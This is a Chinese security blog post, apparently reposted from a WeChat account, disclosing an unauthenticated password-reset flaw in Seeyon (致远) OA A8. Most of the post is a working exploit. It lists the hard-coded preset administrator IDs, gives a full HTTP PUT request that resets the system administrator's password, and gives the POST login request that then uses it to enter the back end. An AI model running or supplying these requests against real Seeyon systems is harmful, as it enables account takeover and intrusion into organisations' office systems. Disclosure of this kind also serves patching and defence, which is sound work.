致远OA ucpcLogin密码重置漏洞

admin 2024年3月27日08:49:41评论112 views字数 947阅读3分9秒阅读模式

致远A8 存在密码重置漏洞,未授权的攻击者在知道用户名的情况下,可以构造特制的请求包,从而修改用户密码,登录系统后台。

根据致远的手册可知,管理员的预制id

致远OA ucpcLogin密码重置漏洞

/**     * 系统管理员预置ID     * @deprecated 角色角色化后,废弃不再使用     */    public static final Long SYSTEM_ADMIN_ID = -7273032013234748168L;    /**     * 审计管理员预置ID     * @deprecated 角色角色化后,废弃不再使用,8.1后可能删除     */    public static final Long AUDIT_ADMIN_ID = -4401606663639775639L;    /**     * 集团管理员预置ID     * @deprecated 角色角色化后,废弃不再使用,8.1后可能删除     */    public static final Long GROUP_ADMIN_ID = 5725175934914479521L;

构造根据预制id数据包获取登录名

PUT /seeyon/rest/orgMember/-7273032013234748168/password/share.do HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeCookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=

致远OA ucpcLogin密码重置漏洞

构造数据包更改密码

POST /seeyon/rest/authentication/ucpcLogin?login_username=system&login_password=share.do&ticket= 

致远OA ucpcLogin密码重置漏洞

成功登录

致远OA ucpcLogin密码重置漏洞

 

 

原文始发于微信公众号(丁永博的成长日记):致远OA ucpcLogin密码重置漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月27日08:49:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   致远OA ucpcLogin密码重置漏洞https://cn-sec.com/archives/2607445.html

发表评论

匿名网友 填写信息